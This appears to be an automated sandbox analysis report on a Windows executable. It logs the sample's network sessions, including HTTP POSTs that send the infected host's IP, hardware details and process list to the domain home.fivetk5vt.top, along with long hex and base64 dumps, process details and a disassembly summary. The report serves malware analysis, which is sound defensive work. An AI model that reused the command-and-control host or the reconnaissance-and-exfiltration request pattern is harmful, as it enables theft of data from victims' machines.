                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 17:18:10.080352068 CET7416OUTData Raw: 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f
                                                      Data Ascii: 5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xU
                                                      Dec 20, 2024 17:18:10.080385923 CET2472OUTData Raw: 45 4c 51 4e 4c 76 62 33 57 4e 4f 6e 6e 31 69 78 38 50 78 32 73 79 35 73 51 4c 58 2b 62 76 70 42 34 6a 67 7a 46 5a 66 6c 57 53 65 49 48 44 2b 4a 34 67 79 47 64 54 4f 4d 38 77 47 48 77 2b 50 78 6d 58 4f 4f 66 38 4f 38 4e 35 72 6a 38 4c 68 49 31 63
                                                      Data Ascii: ELQNLvb3WNOnn1ix8Px2sy5sQLX+bvpB4jgzFZflWSeIHD+J4gyGdTOM8wGHw+PxmXOOf8O8N5rj8LhI1cuxWCxVbFZnl082w2DoyxEsO60b1KMpqlOn\/o\/9DLhzG4XKcdxtwljKOUcW15\/6tZhmNWn9dU+Hc14gyijVvg8YsTl1Ghgsww2V4nE4mGEji+ROMcQqUqtOcf8AxEw\/9WU\/+bH\/AP4hq\/az\/gnZ+3Fa\/t
                                                      Dec 20, 2024 17:18:10.080466032 CET4944OUTData Raw: 6e 5c 2f 57 45 4e 5c 2f 4c 39 4b 72 53 52 5c 2f 65 33 5c 2f 66 34 39 50 38 5c 2f 58 46 42 71 51 2b 69 4a 5c 2f 79 7a 5c 2f 77 42 56 5c 2f 6e 5c 2f 39 58 74 78 54 41 48 62 37 71 65 59 66 71 52 2b 74 54 37 58 5c 2f 41 4e 7a 6e 5c 2f 56 5c 2f 38 74
                                                      Data Ascii: n\/WEN\/L9KrSR\/e3\/f49P8\/XFBqQ+iJ\/yz\/wBV\/n\/9XtxTAHb7qeYfqR+tT7X\/ANzn\/V\/8t+ntnrUHlv8AJ\/Hj\/I\/T6frmg6A8tP40jT\/lr3E\/SqbL83+x\/wBNP3Fv\/wBunbr\/APXq5t\/d\/P8AnJ\/P8\/5Y6iodsfz\/AMfl\/ve5oOyn1+RWLHbs+v8An8OP8mmSt+73v\/38\/wA9Ocf4VN\/rP
                                                      Dec 20, 2024 17:18:10.080482006 CET2472OUTData Raw: 6f 35 34 72 44 5a 68 6c 57 57 38 53 72 48 34 6d 54 64 4a 4a 78 78 47 41 72 35 62 68 75 5a 56 35 31 48 50 41 34 68 54 6f 30 6b 75 65 72 5c 2f 47 5a 67 5c 2f 33 66 5c 2f 51 76 38 61 62 56 69 6d 5a 66 30 48 2b 66 78 72 5c 2f 65 51 5c 2f 35 73 50 61
                                                      Data Ascii: o54rDZhlWW8SrH4mTdJJxxGAr5bhuZV51HPA4hTo0kuer\/GZg\/3f\/Qv8abVimZf0H+fxr\/eQ\/5sPaeX4\/8AAItn+z\/47\/8AWoqb5\/8AZ\/Woaz9p5fj\/AMA0PDfj\/wD8ibpn\/YzWf\/pq1mvvD4Kf8FP\/AIffDT\/gmD8SP2N9X8I+O7z433+g\/Fz4bfDHxnpuleGZvA+j\/Cv42a7oGueO9I1jW7vxRaeJtP
                                                      Dec 20, 2024 17:18:10.080538988 CET4944OUTData Raw: 36 5c 2f 77 43 65 5c 2f 54 4a 71 7a 4a 48 39 7a 5c 2f 50 58 2b 70 50 76 30 71 73 6b 65 49 39 37 5c 2f 50 7a 5c 2f 41 4a 5c 2f 2b 74 51 64 46 50 72 38 76 31 49 66 4d 36 5c 2f 78 5c 2f 70 6e 32 70 69 72 47 7a 4a 49 5c 2f 2b 66 39 47 5c 2f 2b 74 55
                                                      Data Ascii: 6\/wCe\/TJqzJH9z\/PX+pPv0qskeI97\/Pz\/AJ\/+tQdFPr8v1IfM6\/x\/pn2pirGzJI\/+f9G\/+tU23+B8fz4\/+tn8vxqH\/b\/5Z\/8A1\/z6cfXjrQdhD95fn9OkfP8An2\/HioW\/ubfpn+f+T9e9XJE+VPk\/795\/p6fX\/wCvDGE+d\/4\/+Wv+f8\/rQVS6f4f8iHy\/+mNRSfnx5v8AretSyH\/Y2f8AXSX9e
                                                      Dec 20, 2024 17:18:10.080612898 CET2472OUTData Raw: 48 46 30 71 39 44 4e 4d 33 68 6b 4f 41 72 30 4d 52 68 63 5a 57 77 39 57 6a 69 73 33 71 51 77 46 4b 72 54 71 79 67 36 30 34 58 6c 47 45 6f 79 66 75 5c 2f 37 4f 48 37 55 5c 2f 77 41 52 5c 2f 77 42 6d 5c 2f 58 6a 63 65 48 62 6b 36 7a 34 50 31 4b 35
                                                      Data Ascii: HF0q9DNM3hkOAr0MRhcZWw9Wjis3qQwFKrTqyg604XlGEoyfu\/7OH7U\/wAR\/wBm\/XjceHbk6z4P1K5jk8SeBtSuJRpGqDCxve2LgSNo2uJCqpBqtrG3meXBFqNtqFpClsPctI\/4KTftA6H4t8RT3N9onxL+G974w1zXvDfgD4taFZ+JU8N6Tfare3GkWOla9byWviPSLvR9MuIbGwew1o2WnNbx\/ZLUwxrG35u6ff3Go2
                                                      Dec 20, 2024 17:18:10.199959993 CET2472OUTData Raw: 50 38 41 68 2b 75 66 2b 6a 57 52 5c 2f 77 43 48 77 5c 2f 38 41 78 51 56 5c 2f 50 68 34 79 31 48 77 31 34 56 64 64 45 30 33 34 6d 66 43 50 34 6a 5c 2f 45 75 48 78 58 70 48 67 62 57 66 67 31 38 4c 66 45 66 6a 62 78 64 38 51 74 47 38 58 36 76 71 45
                                                      Data Ascii: P8Ah+uf+jWR\/wCHw\/8AxQV\/Ph4y1Hw14VddE034mfCP4j\/EuHxXpHgbWfg18LfEfjbxd8QtG8X6vqEGiR+HbTVR8NbD4P8AxB1ey8R3dn4ev7H4P\/Ff4kXI1K5MtlHfaZYavqGnQ+OdY8HeBbTUo5fi\/wDBLxZ4u8Naomj+Ofhv4F8X+L9e8V+CdQRxbarb3niW5+HOlfBXxnL4e1N4tJ1xPhP8XfiI1tdSSXNsLzSdO1
                                                      Dec 20, 2024 17:18:10.200082064 CET4944OUTData Raw: 6c 2b 50 38 41 77 44 57 47 33 7a 5c 2f 52 45 4c 62 39 33 79 66 4a 5c 2f 77 42 63 2b 33 2b 48 70 54 35 4a 50 33 65 78 45 5c 2f 31 66 5c 2f 4c 54 5c 2f 41 44 39 50 36 64 42 7a 49 64 5c 2f 6d 62 4f 58 2b 7a 5c 2f 33 5c 2f 41 4d 50 78 71 72 75 32 5c
                                                      Data Ascii: l+P8AwDWG3z\/RELb93yfJ\/wBc+3+HpT5JP3exE\/1f\/LT\/AD9P6dBzId\/mbOX+z\/3\/AMPxqru2\/wAfzjjr\/wCTX+fX8K0LHln5T\/v1JJ\/n\/P61D8\/l7z8n5df+nT+VP\/1gHyfuv+WXf\/PB\/PNQrn7h\/wBJT\/rr+\/h\/Dn+Vc51878v6+Yyb7vyR\/P8A6qX\/AKbf569PT8YWVPMcp88f+q8z\/lv\/A
                                                      Dec 20, 2024 17:18:10.200226068 CET2472OUTData Raw: 56 73 56 69 73 54 58 6f 31 4d 50 55 71 52 6c 54 2b 4a 76 48 4d 48 37 50 33 6a 57 32 5c 2f 61 48 2b 43 76 68 4c 78 5a 38 49 66 67 54 62 66 45 37 77 42 2b 78 4c 38 51 64 53 2b 4e 5c 2f 68 6e 34 4a 5c 2f 47 6a 77 70 2b 79 4a 38 52 50 32 6c 76 67 4a
                                                      Data Ascii: VsVisTXo1MPUqRlT+JvHMH7P3jW2\/aH+CvhLxZ8IfgTbfE7wB+xL8QdS+N\/hn4J\/Gjwp+yJ8RP2lvgJpnxr8OfGCw8CfDv4dfC\/V\/ix8HvA3i3Q\/jrBqfhP+z\/2cND8NXfjL4feKIYPAHww8LeKvDcVpY8beNPgB4ov\/ANqKyuNC+O\/xft\/Hnw1\/Yr\/Yn+FMXwd8Zy\/s0+NNQ+Bv7Nnwt8Aar8Svj8\/jn4gfs
                                                      Dec 20, 2024 17:18:10.200263023 CET2472OUTData Raw: 4f 44 6a 57 72 55 31 4b 36 57 46 6a 51 6a 4f 58 4e 47 68 79 4a 51 50 35 53 38 4e 5c 2f 46 68 2b 48 48 69 72 6c 6e 69 66 6b 4f 55 59 56 56 73 6d 7a 71 74 6e 4f 57 35 4e 55 78 47 4d 2b 71 34 65 71 36 6a 72 34 66 44 75 74 55 78 4d 38 66 4f 68 51 71
                                                      Data Ascii: ODjWrU1K6WFjQjOXNGhyJQP5S8N\/Fh+HHirlnifkOUYVVsmzqtnOW5NUxGM+q4eq6jr4fDutUxM8fOhQqyhFOWMlipUoWeK9s\/any58MvEMXgL4o\/FP40\/tONYaJpXiz4c\/Af4j\/AAW+HXwz8H+JL34d\/D744fsPXnh\/VP2PPg14W8O6Jqepa54f+Gtt4YsNY+DUWp694j1NrLS\/EZ8TeP8AXde1T+0vEL+eeGPjDq


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.1049723185.121.15.192808120C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:18:11.731297016 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 17:18:11.851047039 CET2472OUTData Raw: 35 56 78 45 58 56 6b 4c 61 73 6e 5c 2f 42 4a 50 34 67 32 75 44 71 48 78 45 62 54 31 49 7a 76 75 66 68 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f
                                                      Data Ascii: 5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xU
                                                      Dec 20, 2024 17:18:11.851116896 CET7416OUTData Raw: 77 44 72 30 32 53 4d 5c 2f 4a 38 2b 48 48 2b 66 7a 71 4a 37 66 50 38 41 52 6d 39 50 72 38 76 31 49 66 4d 33 4e 73 5c 2f 6a 50 5c 2f 50 4d 5c 2f 77 43 75 7a 5c 2f 6e 31 39 36 68 71 5a 74 38 68 65 50 74 4a 39 66 33 50 30 36 5c 2f 35 37 63 30 7a 72
                                                      Data Ascii: wDr02SM\/J8+HH+fzqJ7fP8ARm9Pr8v1IfM3Ns\/jP\/PM\/wCuz\/n196hqZt8hePtJ9f3P06\/57c0zrv8Akk3\/APPOP05\/znisjop9fl+pWOzzHcf9s5Ixz7\/5+n0psW+Tyf4E\/wCmfH+c\/wCeKlbMm9P\/ACH\/AI\/X\/PFQ4\/g\/j8rypf3X\/Lv\/AJ6emK6DQh8zd\/tiSL979o\/z\/h7ULHPt3j5\/M\/dS
                                                      Dec 20, 2024 17:18:11.851140022 CET2472OUTData Raw: 6e 5c 2f 57 45 4e 5c 2f 4c 39 4b 72 53 52 5c 2f 65 33 5c 2f 66 34 39 50 38 5c 2f 58 46 42 71 51 2b 69 4a 5c 2f 79 7a 5c 2f 77 42 56 5c 2f 6e 5c 2f 39 58 74 78 54 41 48 62 37 71 65 59 66 71 52 2b 74 54 37 58 5c 2f 41 4e 7a 6e 5c 2f 56 5c 2f 38 74
                                                      Data Ascii: n\/WEN\/L9KrSR\/e3\/f49P8\/XFBqQ+iJ\/yz\/wBV\/n\/9XtxTAHb7qeYfqR+tT7X\/ANzn\/V\/8t+ntnrUHlv8AJ\/Hj\/I\/T6frmg6A8tP40jT\/lr3E\/SqbL83+x\/wBNP3Fv\/wBunbr\/APXq5t\/d\/P8AnJ\/P8\/5Y6iodsfz\/AMfl\/ve5oOyn1+RWLHbs+v8An8OP8mmSt+73v\/38\/wA9Ocf4VN\/rP
                                                      Dec 20, 2024 17:18:11.851167917 CET2472OUTData Raw: 66 4a 47 69 65 56 7a 5c 2f 6e 72 7a 52 48 49 59 39 6a 6f 6d 7a 39 31 35 58 45 58 37 5c 2f 48 32 72 38 66 5c 2f 72 35 6f 41 6a 2b 66 7a 4a 70 6b 2b 35 63 66 39 4d 75 50 74 41 36 66 36 4a 32 5c 2f 50 76 54 47 6a 66 35 45 47 66 38 41 6c 34 38 37 50
                                                      Data Ascii: fJGieVz\/nrzRHIY9jomz915XEX7\/H2r8f\/r5oAj+fzJpk+5cf9MuPtA6f6J2\/PvTGjf5EGf8Al487P+frx9afJv24\/eP5n7qKSPuP8+360+P959x96f6RLMZOf8+lB0FaSR0kRPJ3pH\/rZJP8\/wD1v6Mk\/dxoH+RP+fg\/59fen7UkXZ\/qYY\/+ekX+P6+neiON2Z0SHY4\/c\/6z\/PPpx6VPtfOX9fMCH5I9j\/v
                                                      Dec 20, 2024 17:18:11.851265907 CET2472OUTData Raw: 6f 35 34 72 44 5a 68 6c 57 57 38 53 72 48 34 6d 54 64 4a 4a 78 78 47 41 72 35 62 68 75 5a 56 35 31 48 50 41 34 68 54 6f 30 6b 75 65 72 5c 2f 47 5a 67 5c 2f 33 66 5c 2f 51 76 38 61 62 56 69 6d 5a 66 30 48 2b 66 78 72 5c 2f 65 51 5c 2f 35 73 50 61
                                                      Data Ascii: o54rDZhlWW8SrH4mTdJJxxGAr5bhuZV51HPA4hTo0kuer\/GZg\/3f\/Qv8abVimZf0H+fxr\/eQ\/5sPaeX4\/8AAItn+z\/47\/8AWoqb5\/8AZ\/Woaz9p5fj\/AMA0PDfj\/wD8ibpn\/YzWf\/pq1mvvD4Kf8FP\/AIffDT\/gmD8SP2N9X8I+O7z433+g\/Fz4bfDHxnpuleGZvA+j\/Cv42a7oGueO9I1jW7vxRaeJtP
                                                      Dec 20, 2024 17:18:11.851389885 CET4944OUTData Raw: 36 5c 2f 77 43 65 5c 2f 54 4a 71 7a 4a 48 39 7a 5c 2f 50 58 2b 70 50 76 30 71 73 6b 65 49 39 37 5c 2f 50 7a 5c 2f 41 4a 5c 2f 2b 74 51 64 46 50 72 38 76 31 49 66 4d 36 5c 2f 78 5c 2f 70 6e 32 70 69 72 47 7a 4a 49 5c 2f 2b 66 39 47 5c 2f 2b 74 55
                                                      Data Ascii: 6\/wCe\/TJqzJH9z\/PX+pPv0qskeI97\/Pz\/AJ\/+tQdFPr8v1IfM6\/x\/pn2pirGzJI\/+f9G\/+tU23+B8fz4\/+tn8vxqH\/b\/5Z\/8A1\/z6cfXjrQdhD95fn9OkfP8An2\/HioW\/ubfpn+f+T9e9XJE+VPk\/795\/p6fX\/wCvDGE+d\/4\/+Wv+f8\/rQVS6f4f8iHy\/+mNRSfnx5v8AretSyH\/Y2f8AXSX9e
                                                      Dec 20, 2024 17:18:11.851437092 CET2472OUTData Raw: 48 46 30 71 39 44 4e 4d 33 68 6b 4f 41 72 30 4d 52 68 63 5a 57 77 39 57 6a 69 73 33 71 51 77 46 4b 72 54 71 79 67 36 30 34 58 6c 47 45 6f 79 66 75 5c 2f 37 4f 48 37 55 5c 2f 77 41 52 5c 2f 77 42 6d 5c 2f 58 6a 63 65 48 62 6b 36 7a 34 50 31 4b 35
                                                      Data Ascii: HF0q9DNM3hkOAr0MRhcZWw9Wjis3qQwFKrTqyg604XlGEoyfu\/7OH7U\/wAR\/wBm\/XjceHbk6z4P1K5jk8SeBtSuJRpGqDCxve2LgSNo2uJCqpBqtrG3meXBFqNtqFpClsPctI\/4KTftA6H4t8RT3N9onxL+G974w1zXvDfgD4taFZ+JU8N6Tfare3GkWOla9byWviPSLvR9MuIbGwew1o2WnNbx\/ZLUwxrG35u6ff3Go2
                                                      Dec 20, 2024 17:18:11.970799923 CET4944OUTData Raw: 50 38 41 68 2b 75 66 2b 6a 57 52 5c 2f 77 43 48 77 5c 2f 38 41 78 51 56 5c 2f 50 68 34 79 31 48 77 31 34 56 64 64 45 30 33 34 6d 66 43 50 34 6a 5c 2f 45 75 48 78 58 70 48 67 62 57 66 67 31 38 4c 66 45 66 6a 62 78 64 38 51 74 47 38 58 36 76 71 45
                                                      Data Ascii: P8Ah+uf+jWR\/wCHw\/8AxQV\/Ph4y1Hw14VddE034mfCP4j\/EuHxXpHgbWfg18LfEfjbxd8QtG8X6vqEGiR+HbTVR8NbD4P8AxB1ey8R3dn4ev7H4P\/Ff4kXI1K5MtlHfaZYavqGnQ+OdY8HeBbTUo5fi\/wDBLxZ4u8Naomj+Ofhv4F8X+L9e8V+CdQRxbarb3niW5+HOlfBXxnL4e1N4tJ1xPhP8XfiI1tdSSXNsLzSdO1
                                                      Dec 20, 2024 17:18:11.970844984 CET4944OUTData Raw: 67 31 5c 2f 77 55 73 2b 48 6e 37 52 66 67 72 77 5c 2f 77 44 44 58 34 46 4a 34 44 67 5c 2f 62 63 5c 2f 5a 74 31 62 78 48 62 61 42 34 77 30 4c 34 79 65 44 66 44 48 67 62 77 50 6f 33 78 41 2b 4e 6e 77 64 38 50 36 66 66 65 4a 76 68 72 34 35 5c 2f 61
                                                      Data Ascii: g1\/wUs+Hn7Rfgrw\/wDDX4FJ4Dg\/bc\/Zt1bxHbaB4w0L4yeDfDHgbwPo3xA+Nnwd8P6ffeJvhr45\/aPtrfxJ4r8G\/EL4v+AfE3xAjvNT0DTdT+nZI0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1OnUoTr4rOMgzn6zXUrVVO
                                                      Dec 20, 2024 17:18:11.970876932 CET4944OUTData Raw: 4f 44 6a 57 72 55 31 4b 36 57 46 6a 51 6a 4f 58 4e 47 68 79 4a 51 50 35 53 38 4e 5c 2f 46 68 2b 48 48 69 72 6c 6e 69 66 6b 4f 55 59 56 56 73 6d 7a 71 74 6e 4f 57 35 4e 55 78 47 4d 2b 71 34 65 71 36 6a 72 34 66 44 75 74 55 78 4d 38 66 4f 68 51 71
                                                      Data Ascii: ODjWrU1K6WFjQjOXNGhyJQP5S8N\/Fh+HHirlnifkOUYVVsmzqtnOW5NUxGM+q4eq6jr4fDutUxM8fOhQqyhFOWMlipUoWeK9s\/any58MvEMXgL4o\/FP40\/tONYaJpXiz4c\/Af4j\/AAW+HXwz8H+JL34d\/D744fsPXnh\/VP2PPg14W8O6Jqepa54f+Gtt4YsNY+DUWp694j1NrLS\/EZ8TeP8AXde1T+0vEL+eeGPjDq


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.1049729185.121.15.192808120C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 17:18:13.468884945 CET87OUTGET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Dec 20, 2024 17:18:14.742285013 CET212INHTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.104970598.85.100.804438120C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-20 16:18:05 UTC52OUTGET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-20 16:18:06 UTC224INHTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 16:18:06 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-20 16:18:06 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:11:18:01
                                                      Start date:20/12/2024
                                                      Path:C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\j6Nv9kUydV.exe"
                                                      Imagebase:0x700000
                                                      File size:4'495'360 bytes
                                                      MD5 hash:84E0E622857460DA96501532A233C862
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:11:18:14
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
                                                      Imagebase:0x5a0000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:0.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:0
                                                        execution_graph 15442 70d04ad 15443 70d04c2 Process32FirstW 15442->15443 15444 70d04f6 15443->15444 15444->15444 15445 7080d52 15446 7080d5e GetLogicalDrives 15445->15446 15447 7080d71 15446->15447 15448 70e03f4 15449 70e0402 Process32NextW 15448->15449 15450 70e0432 15449->15450

                                                        Executed Functions

                                                        Function 070705E9 Relevance: .4, Instructions: 425COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 692836b6c7676b7a6c8ca51b5963174ba6df4053891ca4b584f818c6dfd5a052
                                                        • Instruction ID: 5f71e2c254f58778f228414f18fe40151e2ada28c9846d66dfc039635e38723d
                                                        • Opcode Fuzzy Hash: 692836b6c7676b7a6c8ca51b5963174ba6df4053891ca4b584f818c6dfd5a052
                                                        • Instruction Fuzzy Hash: 5A917BFB96C115BDF2418181AB54BFE676EE3D7730F308726F423E5502E2A80A899539
                                                        Function 07070849 Relevance: .3, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
